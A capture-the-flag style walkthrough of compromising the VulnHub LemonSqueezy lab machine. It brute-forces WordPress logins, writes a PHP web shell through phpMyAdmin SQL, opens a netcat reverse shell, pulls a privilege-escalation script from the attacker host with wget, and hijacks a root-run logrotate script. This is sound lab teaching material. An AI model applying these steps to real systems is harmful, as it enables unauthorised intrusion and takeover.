LemonSqueezy Walkthrough

Today we're going to do a boot2root pentest walkthrough of the LemonSqueezy machine created by James Hay and hosted at https://www.vulnhub.com/entry/lemonsqueezy-1,473/ .

For this pentest, we'll be using two virtual machines, a Kali Linux machine as the attacking system, and the LemonSqueezy machine as the target machine.

Locating the Target

The first thing we'll do is locate the target machine by running netdiscover from our attacking system.

Looks like 10.0.2.19 is our target.

Additional Configuration

The documentation for this machine tells us to add lemonsqueezy to our hosts file.  That means we're going to use gedit to edit the /etc/hosts file on our attacking machine like so.

Scanning and Enumeration

We start our scans with a quick nmap scan on the target to determine which TCP and UDP ports are open.

Looks like port 80 and 5353 are open. We run another nmap scan on these ports specifically to see if we can get more info, but don't get very much. Our Nikto scan reveals a little more, though.

We found the phpmyadmin directory.  Next, our dirb scan also reveals a possible avenue for enumeration.

Wordpress is a common CMS (Content Management System) app that can be enumerated for possible ways into the system.

Finding a Way In

Knowing that Wordpress is installed on the target system, we can use Wpscan to enumerate potential vulnerable themes and add-ons installed on Wordpress and enumerate registered users.

No vulnerable themes or add-ons, but we've managed to identify two users in the app, lemon and orange. Next, we'll use Wpscan again to try to brute-force the passwords for those users.

We managed to get the password for orange, and we use these credentials to login to the Wordpress page. It turns out that there's a saved draft message in the account with what looks like a password.

This could be the password for lemon on Wordpress, or it could be a password for a user on the phpmyadmin page. After some trial and error, it turns out that this password is orange's password for phpmyadmin, so we login.

Now that we have an authenticated login to myphpadmin, we can try using SQL injection to create a php file that we can use for php command injection. The first step is to click on the SQL tab on the phpmyadmin page.

Then we inject the above SQL command into the console, creating a new php page at lemonsqueezy/wordpress/ . If we nagivate to the page, it's blank, but if we append ?cmd= to the URL, whatever we append will be interpreter as a command to the webserver's OS. For example, if we append ?cmd=whoami to the URL, this happens.

This means that command injection resolved properly. Next, we'll inject a bash command that gives a reverse shell on the target system, but first we have to setup a netcat listener on our attacking system.

After that's taken care of, we can send the following command through our backdoor.php page.

Which opens up the reverse shell on our attacking system.

Privilege Escalation

The first thing we do after the shell opens is upgrade to a TTY shell by running a Python one-liner command. After that, it's time to do some enumeration.

We run which python from the command line, and good for us, Python can be run on this system.  That means we can use our linuxprivchecker.py script to do a lot of the heavy lifting for us in enumerating the system.

We already have linuxprivchecker.py on our attacking system, so the first step to this is setting up a server where the script can be downloaded from.  We can run a Python command from our attacking system that makes our /root/ directory files available for download.

Then, from the target system, we navigate to a directory where we have write permissions.  Normally, it's safe to use /tmp/ for this, but not on this system.  Turns out our safe directory is /var/www/html/wordpress/ .  Once there, we run wget 10.0.2.4/linuxprivchecker.py to get our script, then python linuxprivchcker.py | more to get started.

logrotate is one of the few files that we have write permissions for, and it's also being run as root at intervals by the target system.  That's a good lead.  Let's find out what that file is.

This is a Python script that removes all the file from the /tmp/ directory.  We can edit this file to run a script of our choosing, and that means we'll use the script to open another remote shell on our attacking system, but this time the shell will have root privileges.  This is a two-step process.  The first step is to setup another netcat listener on our attacking system, nc -nlvp 4343, followed by a tedious overwriting of the logrotate file because the text editors on the target system weren't working.

The complete Python script is highlighted above.  In hindsight, it would have been easier to prepare the script on our attacking system, then download it to the target system and switch the two files.  In any case, a little while after completing the script, the script executed on the target system, opening up our remote shell on our attacking system, this time with root privileges.  Now the last thing to do before we finish is to locate and cat out the flag file.  It's usually in the /root/ directory.

Summary

After our initial scans, we were able to enumerate the Wordpress app, getting user login info and then phpmyadmin credentials from info we found in the user accounts.  Once logged into the phpmyadmin page, we were able to use SQL injection to gain a remote shell into the target system.  In the target system, we were able to use an enumeration script to identify a write-able script file that ran at intervals as root, so we modified it to give us another remote shell, but this time with root privileges.  From this new remote shell, we were able to locate the flag file and print it out.

Finish